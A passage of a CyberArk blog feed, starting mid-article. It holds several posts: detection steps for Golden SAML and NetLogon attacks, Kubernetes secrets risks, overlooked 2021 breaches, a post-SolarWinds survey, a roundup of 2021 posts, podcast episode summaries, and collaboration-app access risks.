  • Unusual file access to the encryption keys.
  • Authentications within the service provider that don’t exist within the identity provider. (Golden SAML event IDs 1200 and 1202 from the ADFS server can be used to identify this information.
Detection Steps
  • Windows Event ID 4633 can be used to validate access to private key files. You can monitor READ type access to certain files ending with .ppk, for example, or any standard your company may use.
  • Monitor auths in service provider that didn’t generate Event IDs 1200 and 1202.

 

Exploitation. The attackers also reportedly leveraged an exploit called “NetLogon” (CVE-2020-1472). This exploit essentially allows an attacker to impersonate any account on the network and change the password of the domain controller machine account, for example, to gain full access to the domain.

IOCs
  • IOCs can include anonymous logon events, a machine account having its password changed (as it shouldn’t happen often) and NetLogon attempts to the same system at the same time.
Detection Steps
  • Windows Event ID 4742 can be used to observe a machine account password change and Event ID 5805 can be used to observe NetLogon attempts. Observing a 4742 password change attempt at the same time as multiple 5805 events get generated for the same machine will validate a possible exploit attempt.

Best Practices for Risk Mitigation

Protecting organizations against increasingly sophisticated cyber attacks calls for an improved security posture centered on securing identities and safeguarding privileged access.

In most attacks — regardless of who is behind them — the identity layer is the first entry point into an organization’s environment. Advisory authors note that attackers have “demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments — including cloud environments — by using legitimate credentials.”

In addition to best practices such as implementing multi-factor authentication (MFA); adopting endpoint detection and response (EDR) and anti-virus (AV) solutions; regularly installing patches and requiring strong password practices, these additional cybersecurity steps should be followed as part of a defense in depth approach:

  • Use application controls. Don’t allow execution of arbitrary executables, as many legitimate executables can be used to side execute arbitrary commands. The CISA advisory points to nation state attackers who have used cmd.exe and PowerShell to execute commands and tasks on remote machines.
  • Limit accounts and Shadow Admins. Enforce least privilege access consistently throughout your organization by disabling unnecessary accounts. Limiting privilege is essential as attackers will target high-value assets and access them by stealing credentials and escalating privileges. Threat detection capabilities can help speed detection and block credential theft attempts. For example, zBang, an open source tool, can be used to detect Shadow Admins, stealthy use identities that have sensitive permissions granting them the ability to escalate privileges in cloud environments. These entities, which often arise from misconfigurations or lack of awareness, can be targeted by attackers, putting the entire environment at risk.
  • Secure backups. Take steps to ensure domain controller backups are properly secured, as attackers may try to access or create a copy of the Active Directory domain database to steal credential information or other data about devices, users and access rights. Consider tools with threat detection capabilities to protect the NTDS file that stores sensitive Active Directory data.
  • Use AES Kerberos encryption. Ensure AES encryption Kerberos encryption is used instead of RC4, to help prevent adversaries from abusing a valid Kerberos ticket-granting ticket (TGT) or sniffing network traffic to obtain a ticket-granting service (TGS) that may be vulnerable to brute force. The zBang tool’s RiskySPN module can be used to help detect targets for kerberoasting.
  • Protect credential certificates. Protect stored certificates to block attempts at token-signing certificates and mitigate threats such as the Golden SAML attack.

The following CyberArk Identity Security offerings can help organizations protect against cyber threats and comply with the latest CISA advisory guidance:

]]>
3 Kubernetes Risks and What to Do About Them https://www.cyberark.com/blog/3-kubernetes-risks-and-what-to-do-about-them/ Tue, 11 Jan 2022 17:00:50 +0000 https://www.cyberark.com/?p=126407

Today, speed trumps nearly everything when it comes to software development. And as digital business requirements evolve, developers are being asked to work even faster and with more agility than ever before. Take Netflix, for example: to meet society’s need for new, binge-worthy watches, the company delivers hundreds of microservices and thousands of deployments each day.

Containers are often used by developers to meet this need for speed by packaging both software and its necessary dependencies together. And according to a 2021 Red Hat study, 88% of those teams rely on Kubernetes to manage their containerized workloads and services, automate processes and move faster and at scale.

Kubernetes and the Not-so-Secret Security Challenge

Despite its popularity, and perhaps partly because of it, the Kubernetes orchestration platform introduces new identity-centric security challenges that must be tackled early in the development cycle. Otherwise, small issues can grow quickly, resulting in costly delays and defects.

The same Red Hat study referenced above found that almost all developers (94%) experienced at least one Kubernetes-related security incident in the last 12 months, while more than half have delayed deploying applications into production due to security concerns.

In dynamic cloud-native environments, secrets — such as passwords, SSH Keys, certificates and API tokens — are used widely to grant access to anyone (such as an application developer) or anything (such as an application) that knows them. Organizations become vulnerable when these secrets are leaked to logs, exposed in application code or mishandled in other ways. Exacerbating the issue, secrets have the unique ability to grant access to additional secrets and privileges, which is known as the “secret zero problem.”

Three Key Kubernetes Risks and Mitigation Steps 

Securing secrets in containerized environments requires the collaboration of both development and security teams. Here are three potentially vulnerable areas within Kubernetes to focus on as part of a true DevSecOps approach:

Kubernetes Risk #1: Hardware

Whether it runs on-premises or in a cloud managed by a third party, Kubernetes still requires a hardware platform. If an attacker can breach the virtual machine running Kubernetes and gain access to root privileges, the attacker can go on to breach the Kubernetes cluster.

Security best practices:

  • Enforcing the principle of least privilege can go a long way in protecting the hardware that underpins both Kubernetes and the containers themselves. Provision virtual machines with the least number of privileges necessary to perform their function to make it difficult for attackers to gain root access.
  • Rotate credentials often and also consider vaulting to further strengthen protections.

Kubernetes Risk #2: The Kubernetes API Server

Beyond the physical machines, the Kubernetes control plane must also be secured. This control plane has access to all the containers running in a cluster, including the Kubernetes API server, which acts as the front end of the control plane and facilitates user interaction within the cluster.

An attack on the API server can have big implications. Even a few stolen secrets or credentials can be used to escalate an attacker’s access and privilege, and what was first a small crack in the armor can quickly turn into a network-wide issue.

Security best practices:

  • To minimize risk, start with blocking credential theft and malware threats on the endpoint — where many attacks begin — paying close attention to local machines used by users with administrative privileges in Kubernetes.
  • Use multi-factor authentication (MFA) to authenticate access to the Kubernetes API server. That way, even if a credential is stolen, it can’t be authenticated or used to access Kubernetes. Development teams can also set the experimental-encryption-provider-config flag on the Kubernetes API server to bolster secrets protection.
  • Once a user is authenticated in Kubernetes, they can access all the resources within the cluster, so managing permissions is critical. Role-based access control (RBAC) will help ensure users only have the access rights they need and aren’t overly permissioned.
  • Similarly, least privilege should be enforced across Kubernetes service accounts, which are automatically created when a cluster is set up to help authenticate Pods. Secrets should also be rotated on a regular basis to keep access out of the hands of those who don’t need it.

Kubernetes Risk #3: Containers

Pods and the containers within them are the building blocks of a Kubernetes cluster and contain the information needed to run the application. There are several key areas of vulnerability within this container ecosystem and workflow, as illustrated below.  To explore them in depth, read our eBook “Securing Containers in a Kubernetes Environment.”

Security best practices: Consider these container security best practices, along with those outlined above:

  • While it may seem logical, do not build secrets into the code or the container image. Otherwise, anyone with access to the source code will also have access to information in code repositories, logs and elsewhere.
  • Avoid using environment variables for sensitive information. This will help prevent attackers from discovering clear text secrets with simple commands if they compromise access to the container API.
  • Implement RBAC, limit secret access to the processes running inside a given container, and delete secrets/revoke access to resources when they are no longer needed to minimize exposure.
  • Log usage, including when a secret is injected, rotated or removed from a container and regularly audit access to critical systems. Also, consider centralizing secrets management to make audit, access control and secrets management more manageable.

Arm your development teams with these best practices to help strengthen security across your organization’s entire Kubernetes environment. And look for ways to incorporate self-service capabilities into developers’ everyday processes (like code scanning, for example) to make life easier for everyone — and keep things moving quickly.

When security and development teams partner to help defend against attacks, drive operational efficiencies, and satisfy audit and compliance requirements, everyone wins.

]]>
3 Cyber Attacks that Didn’t Get Enough Attention in 2021 (But Probably Should Have) https://www.cyberark.com/blog/3-cyber-attacks-that-didnt-get-enough-attention-in-2021-but-probably-should-have/ Fri, 07 Jan 2022 14:00:27 +0000 https://www.cyberark.com/?p=126217

In 1988, graduate student Robert Tappan Morris created a computer worm and inadvertently launched what many consider to be the world’s first cyber attack. Since that infamous “Morris Worm,” major events from Stuxnet to WannaCry have filled the pages of history, inspired TV shows and best-selling books, and reshaped the cybersecurity landscape.

But for every notorious attack, there are countless others that don’t make headlines, are overshadowed by competing news or simply get brushed aside. In 2021, SolarWinds and a series of high-profile ransomware attacks dominated the media and conversations, yet there were other significant incidents that had the potential for far-reaching privacy, regulatory and even human safety implications — and warrant another look. There could be lessons still waiting to be learned.

Florida Water Facility Attack Highlights Pervasive ICS Vulnerabilities

In February 2021, a threat actor attempted to poison a Florida city’s water supply in what seemed like an attack straight out of a Hollywood movie. A plant operator first noticed something amiss when his cursor began moving across his computer screen to open programs used to control water treatments.

The attacker reportedly increased the level of sodium hydroxide in the water 100 times. Thanks to the operator’s quick discovery and immediate actions to stabilize the levels, no one was harmed. But the real-world “could haves” loomed large, and the incident highlighted how dire critical infrastructure cybersecurity challenges remain.

The public utilities sector is uniquely vulnerable for many reasons. For one, much of the infrastructure controlling industrial control systems (ICS) — the systems that support essential services — dates to the 1980s or 1990s. The critical nature of utility operations required the developers of these systems to focus on system availability and interoperability but not necessarily on security. Over the years, as these systems became increasingly joined to internet-connected IT, they became more attractive targets for attackers.

Both government and the private sector have ramped up spending on cybersecurity operations and maintenance, yet despite these efforts, many utility companies struggle keep up with increasingly sophisticated and highly targeted attacks. And the stakes are high: beyond bad publicity, brand damage or costly regulatory fines, public safety is potentially at risk, as evidenced by this incident.

Following the attack, former director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Christopher Krebs wrote, “Unfortunately, that water treatment facility is the rule rather than the exception. When an organization is struggling to make payroll and to keep systems on a generation of technology created in the last decade, even the basics in cybersecurity often are out of reach.”

The Verkada Breach Shows the Dark Side of the IoT

Comprising billions of connected devices (and counting), the Internet of Things (IoT) represents a potentially massive attack surface and continues to pose a formidable cybersecurity challenge for enterprises.

When IoT devices are not secured like other sensitive network assets, risk can escalate quickly, as seen in March 2021 when attackers breached Verkada, a cloud-based video security company.

Using legitimate admin account credentials found on the internet, the attackers were able to navigate through live feeds of some 150,000 cameras stationed in factories, hospitals, classrooms, prisons and more, while also accessing sensitive footage belonging to Verkada software customers. It was later confirmed that more than 100 people within the organization had “super admin” access, each of whom could access thousands of customer cameras — demonstrating the potential dangers of overprivileged users.

Fortunately, damages from the incident were reportedly limited, but things could have been much worse. The breach was just the tip of the iceberg, giving a glimpse of how dangerous the IoT can be. For those paying attention, it prompted new questions and fueled ongoing privacy debates around how surveillance technology should be used, how sensitive data — such as bedside footage of a hospital patient or proprietary manufacturing processes in action — should be stored and how access to this data should be managed.

While the incident didn’t garner lengthy news cycles, it shouldn’t be forgotten. The question of “who watches the watchmen” will likely reemerge as daily life becomes increasingly connected.

The Twitch Data Leak Reinforces the Need for Least Privilege Access

Popular video game site Twitch was targeted in October 2021 with what the New York Times called a “potentially disastrous” data breach.

The threat actors reportedly stole the platform’s entire source code, along with 125GB of sensitive data including top user payout information, and then leaked it online in an effort to “foster more disruption and competition in the online video streaming space,” according to Video Games Chronicle.

According to a company statement, the incident was caused by a “server configuration change that allowed improper access by an unauthorized third party.” Particularly in cloud-based environments, such misconfigurations — including unchanged default credentials or those granting excessive permissions — are very common, are often used as attackers’ entry point of choice and can potentially open a path to sensitive assets such as source code and other intellectual property. The dynamic nature of the cloud makes traditional change control approaches for proper configuration extremely difficult.

While the company later said that user credentials and bank details were not accessed or exposed in the Twitch breach, privacy-conscious users didn’t wait to find out. The Guardian reported that global online queries for “how to delete Twitch” surged by 733% on the day the news broke, noting the platform’s popularity could potentially take a hit as a result of the breach.

The attack illustrated the many challenges companies face in securing cloud environments and emphasized the importance of least privilege access in reducing risk and defending against internal and external threats.

Those 2021 cyber attacks quickly lost the spotlight; however, there are valuable considerations and lessons to be learned from them as we begin a new year. Because, as Edmund Burke once said, “In history, a great volume is unrolled for our instruction, drawing the materials of future wisdom from the past errors and infirmities of mankind.”

]]>
Has SolarWinds Transformed Cybersecurity? https://www.cyberark.com/blog/has-solarwinds-transformed-cybersecurity/ Wed, 05 Jan 2022 17:00:32 +0000 https://www.cyberark.com/?p=126098

A year ago, the business world entered 2021 still reeling from the catastrophic SolarWinds attack that impacted thousands of organizations and put software supply chain risks on everyone’s radar — from government officials to enterprise CEOs to small business owners.

To say it was a watershed moment would be an understatement. Considered one of the most damaging data breaches in history, SolarWinds’ long-term impact continues to be tallied. The attack highlighted inherent weaknesses in software supply chains — many exacerbated by the global pandemic — and showed us just how far attacker innovation has come. It kicked off a series of events that would define 2021 and became the lens through which all subsequent cybersecurity incidents are viewed. Yet as we enter 2022 — the “post-SolarWinds era” — has anything actually changed in terms of how organizations protect themselves? We recently polled a small group of enterprise security professionals to find out. *

What (If Anything) Has Changed Since the SolarWinds Attack?  

According to our research, the cybersecurity community has mixed feelings about where things stand a year later. The impulse is to say that organizations have collectively emerged stronger and more prepared for what’s ahead, but that may not actually be the case.

What’s clear from our findings is that organizations are very aware of supply chain risks: 86% of organizations either “strongly agree” or “somewhat agree” that the supply chain continues to be a vulnerability, while 88% either “strongly” or “somewhat” agree that we’ll likely see an increase in sophisticated attacks like SolarWinds.

“I think that the SolarWinds attack was eye-opening, emphasizing critical risks associated with the software supply chain. I believe supply chain risks were treated with somewhat lower priority until this attack, and now are elevated in importance. Greater awareness and understanding of these risks definitely make us work harder to be secure.”

– Privileged Account Management Professional, Global Financial Institution

There’s broad consensus on the need to embrace a Zero Trust model — and overall mindset — to reduce risk: 62% either “strongly agree” or “somewhat agree” that their organization is moving toward Zero Trust since the SolarWinds attack. Meanwhile, 98% agree that implementing strong Identity Security policies and controls that restrict privileged access to Tier 0 systems will help them make this shift to Zero Trust by reducing exposure and enabling earlier detection.

“I believe that the SolarWinds case has shown that Zero Trust policies should apply not only to internal/external users but also to third-party suppliers. The threat has been described before, but there was no such a case that impacted so many companies before.”

– Anonymous Respondent

In some cases, this heightened awareness of supply chain vulnerabilities has translated to action: 20% “strongly agree” that their organization has closely examined their supply chain for vulnerabilities and attack points and has taken action to mitigate risks.

“We started defining risk criteria for different types of suppliers’ services such as supplier and customer dependencies, critical software dependencies and single points of failure.”

– Anonymous Respondent

But unfortunately, in many organizations, things haven’t changed much at all:

  • 42% “strongly disagree,” “somewhat disagree” or “do not know” if their organization has defined risk criteria for the critical software dependencies in their organization’s software supply chain.
  • When asked if their organization validates third-party code and software before using them, 35% either “strongly disagree” or “somewhat disagree.”
  • 32% of respondents either “strongly agree” or “somewhat agree” that their organization underestimates the effect an attack like SolarWinds can have.
  • As a result, approximately one-quarter (26%) do not believe that, or do not know if, their organization is more equipped to defend against similar attacks since SolarWinds.

“A year later and still the same challenges.”

– Information Security Engineer, Large Financial Institution

Where to Go from Here?

Strong supply chain security must be more than a resolution this year — it must become a reality. A starting point is simply acknowledging the fact that any identity – human or machine – within your organization could be a target. With this “assume breach” mindset, you can focus and prioritize your efforts on stopping threats from compromising identities and breaking the privileged attack chain to protect your organization’s most valuable assets.

The time for action is now because, as one senior systems engineer at a large healthcare organization put it, “This story is far from over.”

*CyberArk data is based on an informal survey conducted with a set of security professionals based in the United States and Europe, sample size <100. Free-form survey responses have been edited for length and clarity.

]]>
Top Identity Security Blog Posts of 2021 https://www.cyberark.com/blog/top-identity-security-blog-posts-of-2021/ Fri, 31 Dec 2021 15:33:58 +0000 https://www.cyberark.com/?p=126076 Top 2021 Identity Security Blog Posts

2021 marked year two of our pandemic-driven, decentralized reality. While digital transformation initiatives moved full-steam ahead and employees continued to work from anywhere on devices of every kind using cloud-based services to stay connected and productive, identity has proven to be the ultimate attack vector.

Over the past 12 months, we’ve explored identity’s central role in everything from major breaches and emerging attack techniques to public policy discussions and new C-level job titles. As we close out 2021, here’s a look back on some of our most popular Identity Security blog posts.

Cyber Attacks Get Highly Targeted

Instead of casting a wide net, many attackers targeted very specific organizations for very specific reasons this year. Illustrating this trend, Lavi Lazarovitz, head of CyberArk Labs, deconstructed the anatomy of the targeted SolarWinds attack that leveraged a digital supply chain vector to infect thousands of organizations around the world.

While it’s important to understand the differences between opportunistic and targeted attacks, the initial attack vector remains the same, no matter the adversary’s strategy. By compromising an identity at the endpoint — whether it’s a desktop, laptop or server — attackers can gain entry to an organization and potentially open a privileged pathway that leads to its most valuable assets.

The Supply Chain Attack Saga Continues

SolarWinds was far from the first supply chain attack, but it served as a wake-up call for many organizations. On the flipside, attackers saw opportunity and homed in on upstream providers to extrapolate weaknesses and expand their reach.

In one post, CyberArk principal security researcher Nimrod Stoler dug into the Codecov breach — a highly evasive supply chain infiltration in which malicious actors targeted a popular software platform, infected the CI/CD pipeline, added a credentials harvester and then used it steal thousands of MSP customers’ credentials. In another piece, Lavi Lazarovitz explored the massive Kaseya ransomware supply chain attack, which exploited trusted software (and the access and permissions it granted) to infect the IT management software provider’s global customer base and their downstream customers. And as CyberArk Global Sales Engineer Len Noe showed us, industry tools like the MITRE ATT&CK framework can help organizations better understand supply chain attacks and defend against future attempts that utilize similar tactics and techniques.

Attackers Live off the Land and Hide in Plain Sight

Adversaries looked for ways to use victim organizations’ own technology resources against them to “live off the land” (LotL) and remain hidden for long periods of time. Bryan Murphy, leader of our remediation services team, shared some patterns and red flags to watch out for. He also explained how a multi-layered endpoint security approach combining least privilege defense, strong authentication for identities, credential theft protection, application control and ransomware blocking can make it significantly harder for attackers to gain entry in the first place. But if they succeed (and you must assume they will), having layered controls in place will make it difficult for attackers to remain hidden for long.

Interest in Passwordless Authentication Grows

Nearly all the major breaches witnessed this year — as in years past — shared something in common: the compromise of identities and abuse of privileged credentials played a critical role. These attacks often began with credential theft via phishing and other common methods. This is one of several reasons why many enterprises are re-thinking passwords and traditional credentials altogether and exploring passwordless authentication to help protect identities linked to human users, secure critical corporate assets and even boost their bottom lines.

Cybersecurity Becomes “The” Board Room Topic

There isn’t an executive team on the planet that wasn’t talking about cybersecurity this year. It became a board-level issue (if it wasn’t one already), thanks to a seemingly endless string of high-profile attacks and skyrocketing cybersecurity insurance costs. It even drove the creation of new roles such as the Business Information Security Officer (BISO) who could bridge both sides of the business.

Security and IT teams were asked to defend and demonstrate their risk mitigation efforts under increased scrutiny. Yet articulating security priorities, such as moving toward a Zero Trust model, to non-technical audiences can be challenging. This post can help guide Board and C-level discussions on why Identity Security matters and how to get started — without getting lost in the weeds.

What’s Next

As we enter 2022, we can expect even more of the same along with continued attacker innovation. For instance, the recently disclosed Log4j vulnerability shows us how attackers may increasingly use popular open-source software to automate and magnify their supply chain attacks.

Though more cyber attacks are inevitable, loss is not. By placing identity at the heart of your security strategy, your organization can ring in the New Year with confidence, knowing your most critical assets are secure.

 

]]>
12 Cybersecurity Conversations Spanning Identity, Privilege and the Evolving Landscape https://www.cyberark.com/blog/12-cybersecurity-conversations-spanning-identity-privilege-and-the-evolving-landscape/ Tue, 28 Dec 2021 13:30:27 +0000 https://www.cyberark.com/?p=126064 cybersecurity conversations identity privilege

When this year comes to a close (which is just about a blink away now), cyber crime damages will have cost the world $6 trillion, and ransomware attacks rose 148% during the rush to adapt to a largely remote/distributed workforce for the first time in history. Never has it been more incumbent upon the cybersecurity industry to do more than just try and stay a step ahead.

This year, CyberArk partnered with Cybercrime Magazine on a series of podcasts called “CyberTalk with CyberArk,” with the goal of thinking beyond the next step or the next attack to create systems and philosophies that work in our current reality. Taken as a whole, these conversations provide more than just a glimpse into the minds of the people working to define cybersecurity, apart from just patches and passwords. They reveal an industry that is constantly evolving and innovating, changing how we approach concepts like “identity” and “access” — and working tirelessly to embed security into every phase of project and product development.

With the last of episodes having just rolled out, here’s a look back at 12 conversations from 2021. Hear how members of the CyberArk organization, from Founder and CEO Udi Mokady to Chief Customer Officer Shahar Layani — along with executives from outside the company — view the evolving cybersecurity landscape and what the future may hold.

EPISODE 1: “Why and How Organizations Need to Implement Identity Security, With CyberArk CEO Udi Mokady”

At the top of his conversation, Mokady touches upon a key theme that will carry throughout the series: “Identity is the new perimeter. It is the new battleground.” COVID eradicated the old perimeters, and the idea that identity is solely human quickly became a thing of the past as well. Machine identity is growing, and it’s becoming more and more important to acknowledge that as apps and devices spread out and become integral to our personal and professional lives.

In this grounding episode, Mokady discusses how the notion of Zero Trust was nascent in the earliest days of CyberArk and how cybersecurity has evolved from building walls to developing and sharing best practices, so organizations and individuals can protect what matters most. “Every organization under the sun can be a target because almost every company in some way, shape or form is a software company,” he says. “It’s applicable to all levels and industries.”

EPISODE 2: “Identity Access Management and Ransomware, with Andy Thompson, CyberArk Technical Evangelist”

Understanding the new battleground is the first step, and Technical Evangelist Andy Thompson picks up that ball and runs with it in this episode. Here, the focus is on thinking like an attacker, not just to prevent breaches (which is becoming less and less possible) but also to mitigate their damage by limiting what an attacker can access and where they can go.

Thompson walks us through recent major ransomware attacks and spotlights the primary lesson that connects them all: compromised identity used to gain access to privileged credentials. He shares how he and his CyberArk Labs team pour over millions of past ransomware attacks and how doing so helps them fortify and evolve the team’s proven mitigation techniques.

EPISODE 3: “Cyber Espionage Puts Supply Chains and Infrastructure at Risk, with Lavi Lazarovitz, CyberArk Senior Director of Cyber Research”

Senior Director of Cyber Research Lavi Lazarovitz echoes Mokady’s “every organization under the sun can be a target” comments in Episode One by digging into recent high-profile breaches. Lazarovitz breaks down how attackers use whatever’s needed to get to the code, database and data they’re after — and expresses concern that it’s particularly difficult to monitor and control automatic updates, and emerging technology can be difficult to monitor.

In the end, Lazarovitz suggests that companies can protect themselves by creating visibility. They need to see exactly what’s coming inbound, the level of privileges, what versions of programs are running, what kind of code is being pulled from libraries — as well as the many tools for cloud and container environments.

EPISODE 4: “Why Higher Education Needs a Cybersecurity Program, with CyberArk Senior Director – Public Sector Matt Kenslea”

CyberArk’s Senior Director – Public Sector Matt Kenslea shifts the focus of the series slightly in his podcast conversation by turning to the world of higher education. One of the most surprising takeaways from his episode is the fact that the FBI rates higher education institutions as being at a greater risk of ransomware attack than even financial institutions. Universities are built to be open, to foster sharing and collaboration. Bad actors know how to exploit that.

Kenslea goes on to offer some solutions for privilege and protection for these institutions, and they must include Zero Trust architecture that limits privilege. Schools must see everyone as a potential threat. They need to secure high-value targets with session isolation, lock down common platforms and make sure to give the least privilege for endpoint protection.

EPISODE 5: “What MFA Means for Your Organization, with Shay Nahari, VP of Red Team Services at CyberArk”

One of the key themes emerging from the podcast series has been how individuals and organizations need to find ways to enhance security without slowing their ability to operate or live their daily lives. Enter Shay Nahari with a detailed discussion on Multi-Factor Authentication (MFA).

Nahari digs into the increasing supply chain woes that have been exacerbated by the pandemic, and he explains how companies need to realize they cannot control everything in their supply chains, so they must assume they will get breached.

MFA can help mitigate the risk and alert organizations to malicious activity, but it’s not about prevention; instead, it’s about limitation, he says. Successfully integrated MFA is all about a balance between security and operation.

EPISODE 6: “The Cybersecurity Customer Experience, with CyberArk Chief Customer Officer Shahar Layani”

Security controls are only as good as their adoption, which is stressed by CyberArk CCO Shahar Layani in this installment. He explains the CyberArk Blueprint alluded to by Udi Mokady, which helps organizations and individuals understand their own journeys and how security measures can be implemented and maintained effectively along each step.

In one of the conversation’s most insightful moments, Layani explains how security is a team game, and it’s important for customers to understand that concept from the start.

EPISODE 7: “Cybersecurity Insurance What it Entails and Why It’s Important, with CyberAcuView CEO Mark Camillo”

Despite the dramatic shift in our technological landscape and its immediate impact on our working and personal lives, cybersecurity still isn’t a top-of-mind topic for many people. So, it stands to reason that cyber insurance is even less of a priority. And in this episode, CyberAcuView CEO Mark Camillo is here to talk us through it and why it’s been such a hot industry topic in 2021.

Camillo discusses how the concept of cybersecurity insurance has evolved over the years and how insurers review the cybersecurity measures taken by companies to help prevent attacks as part of their initial assessments. MFA, for example, can help reduce the cost of insurance. Camillo also talks about his belief that we’ll see more partnerships between tech and insurance companies going forward.

EPISODE 8: “Home Networks and Enterprise Security, with Bryan Murphy, Director of Consulting Services and Leader of CyberArk’s Remediation Services”

With decentralized workforces (and IT departments), the new normal must include educating individuals on how to protect their homes and personal devices, as if they are extensions of their offices. Because, says Bryan Murphy, Director of Consulting Services and Leader of CyberArk’s Remediation Services, they are.

Murphy explains how he teaches and trains employees to recognize security threats when working remotely — like being able to spot phishing emails and to be more careful when entering credentials.

He explains his “Back to Basics” as an important approach for security: Don’t assume spam filters will catch all threats; be careful when using outdated equipment, outdated routers and firmware; and use guest networks for friends and family to mitigate some threats while at home. And reset passwords. All of these are simple but effective ways to mitigate attack threats.

EPISODE 9: “Security Issues with Serverless Functions, with CyberArk’s Tal Kandel”

Cloud technology has been adopted by a larger majority than ever before, due to the new ubiquity of working from home. It makes sense, right? Employees need to access their work infrastructure away from the office. But with the convenience and flexibility of the cloud comes, of course, added vulnerabilities and new forms of attack.

Innovation Business Senior Director at CyberArk Tal Kandel explores these challenges in this episode in a discussion that covers the unique particularities of using serverless functions like the cloud and how to manage it to provide security for a remote workforce. Each entity, Kandel explains — whether human or machine — should only be offered the least privilege because any unnecessary entitlements can potentially be abused by malicious motives.

EPISODE 10: “Creating a Cybersecurity Culture, with Highmark Health CISO Omar Khawaja”

Cybersecurity isn’t a piece of software; it’s a lifestyle. Arguable hyperbole aside, Highmark Health CISO Omar Khawaja spends this episode detailing the need for what he refers to as the “human element” in all cybersecurity protocols.

Khawaja explains that, even now, 84% of security issues still involve human beings. Training is hard because people don’t always pay attention to the details of everything they encounter — they’re rushed or maybe not all that cyber-savvy to begin with — and the ultimate goal is to change behavior. Most security programs excel at the things they can do themselves, he says, but the vulnerabilities lie in the human risk factor. As Khawaja goes on to explain, organizational change management principles and tools are the secret sauce to how you can change how humans behave.

EPISODE 11: “The Future of PAM and Identity Security, with CyberArk Senior VP Barak Feldman”

Calling back to the first episode with Udi Mokady, CyberArk Senior Vice President Barak Feldman ponders the shifting landscape of Identity Security in his CyberTalk conversation and discusses how innovation in the security space must be as swift and creative as those seeking to undermine those efforts.

The focus of his discussion, of course, centers around Privileged Access Management (PAM). And Feldman sounds similar refrains to those of Mokady and others in the podcast series: Companies need to assume breach, use a Zero Trust model and utilize MFA and privilege controls. New guidelines from the U.S. and other governments throughout the world in the public sector are creating new and useful guidelines, he says, but CyberArk must always think about the user experience while also considering emerging tech and protection.

EPISODE 12: “Why DevSecOps is Key to Cybersecurity Initiatives, with CyberArk DevSecOps GM Kurt Sand

Who better than CyberArk’s resident DevSecOps evangelist Kurt Sand to, well, evangelize about the need for DevSecOps in robust and dynamic cybersecurity initiatives? Sand explains the importance of integrating security earlier in the production timeline of any program or application and making thinking about security almost second nature — not just for those tasked with overseeing it but with everyone along the production pipeline.

Sand discusses the “Shift Left” idea as a security approach to development — the principle of testing early for bugs and defects is being applied to security because it’s expensive to remediate. Exploring vulnerabilities early on in development will save money and time in the long run. Organizations, Sand says, need to realize DevSecOps is a never-ending process — they need to understand they are building an ongoing program. And it must be made a regular part of their ongoing processes as soon as possible. Sand puts it bluntly: “Procrastination isn’t in your favor — get started.”

You can listen to all of series’ episodes HERE, or you can find them wherever you stream or download your favorite podcasts.

]]>
Workforce Trends to Watch in 2022: What Attackers Want from Collaboration Apps https://www.cyberark.com/blog/workforce-trends-to-watch-in-2022-what-attackers-want-from-collaboration-apps/ Thu, 23 Dec 2021 16:21:40 +0000 https://www.cyberark.com/?p=126045 Workforce trends 2022

In a pandemic-altered business world, one of the most striking developments that’s still unfolding is the global movement of workers rethinking what matters most — in work, life and everywhere in between.

Some call it the Great Resignation: The Labor Department said a stunning 4.2 million U.S. workers quit their jobs in October 2021 alone. Others call it the Great Reconsideration: A Harris Poll found that more than half of U.S. workers want to leave their jobs, with 76 percent citing a need for flexibility in how, when and where they work.

Either way, the pace and magnitude of employee turnover is unprecedented, and that’s affecting organizations’ strategies at every level — culture, operations, technology and, of course, security. In response, organizations are scaling up their efforts to find, hire and integrate new talent with a constant focus on empowering workers with the tools to thrive.

During such change, the only constant seems to be the need to make sure work-from-anywhere employees are up and running on the right applications, devices and systems with the right level of access. And on the flip side, it means being able to shut off access quickly and at scale to protect corporate assets amid personnel changes.

Exploring the role of virtual collaboration apps — and their inherent risks

According to Gartner®, nearly 80 percent of workers are using collaboration tools for work in 2021, up from just over half of workers in 2019.[1] If you’re working remotely some or all the time, collaboration tools are the primary means of interacting with co-workers, performing job duties and, in turn, driving your career forward. This includes mainstays such as Slack, Teams and Zoom that are used across industries and professions.

The trouble is all these changes — while full of opportunity — also open to the door to new threats. Every time an organization deploys any type of application to help workers do their jobs, this results in more identities to secure.

Here’s a snapshot of some interrelated access management workforce trends we’ll continue to see in 2022.

Fast turnover + remote work = trouble in assigning and revoking workers’ access

Every time a new worker enters the company or an existing one leaves, it’s another identity lifecycle management challenge for HR and IT to solve. Incoming talent needs new accounts and quick access to a range of critical applications. Meanwhile, organizations need to shut off most access for outgoing talent — and every time somebody falls through the cracks, productivity and/or security can take a hit.

Collaborative tools empower remote workers but also create new security headaches

Imagine a scenario in which a worker gives two weeks’ notice but then (with an eye toward getting a head start at a new job) retrieves a few files from a collaboration app’s shared folders. The employee isn’t planning to use any proprietary information after leaving the company — just some key points and slide templates.

But for some reason, weeks pass, and the now-former employee’s access still hasn’t been revoked. They can just dip in and retrieve old files whenever they want.

What could the harm be?

For starters, who’s managing the former employee’s credentials for the application? Not the employee, who’s moved on a new company and no longer getting monthly emails from their old IT team requiring password updates. And not the former employer, who’s unaware of the employee’s lingering access and — for the sake of this hypothetical scenario — doesn’t know the password for this application was weak, easy to guess and used across various accounts.

This lax approach to passwords is all too common and reflects a prime target for today’s attackers. Indeed, 97 percent of security leaders say end-user credentials make up the largest increase in attacks against their organizations. Relevant to the above example, cyber criminals look for dormant application accounts and stale privileges, which are security lapses that high workforce turnover can intensify.

Collaboration apps, in the wrong hands, can be the entrance to a virtual goldmine.

Workforce trends collaboration apps

How to get ahead of converging workforce trends in 2022 and beyond

Even when collaboration apps with functions such as real-time chatting or video conferencing are deployed and work smoothly, they aren’t always fortified properly against malicious actors. A single failure in this area can translate to a world of difficulties by giving attackers a foothold from which to collect sensitive information or move on to other resources.

For IT and security leaders, it’s a good time to think about ways to update access management strategies to reflect the ever-changing workforce. Here are three areas to consider:

  1. In times of high turnover, employ AI and automation to make the tasks of granting, adjusting or revoking a worker’s access … well … more workable. This includes onboarding and offboarding, as well as career moves that not only change a worker’s job function but also the types of access they should (and shouldn’t) have within a collaboration application.
  2. Secure identities holistically by applying protection and transparency to not only the initial point of authentication but also to users’ activity within application sessions. This includes recording, monitoring and auditing activity in applications where users can take high-risk actions with high-value resources.
  3. Lastly, protect the wide range of endpoints that a distributed workforce now uses to gain access to applications, systems and data from distributed locations. This includes desktops, laptops and devices used at home, in the office and in public locations.

Final thoughts: Securing your workforce in times of constant change

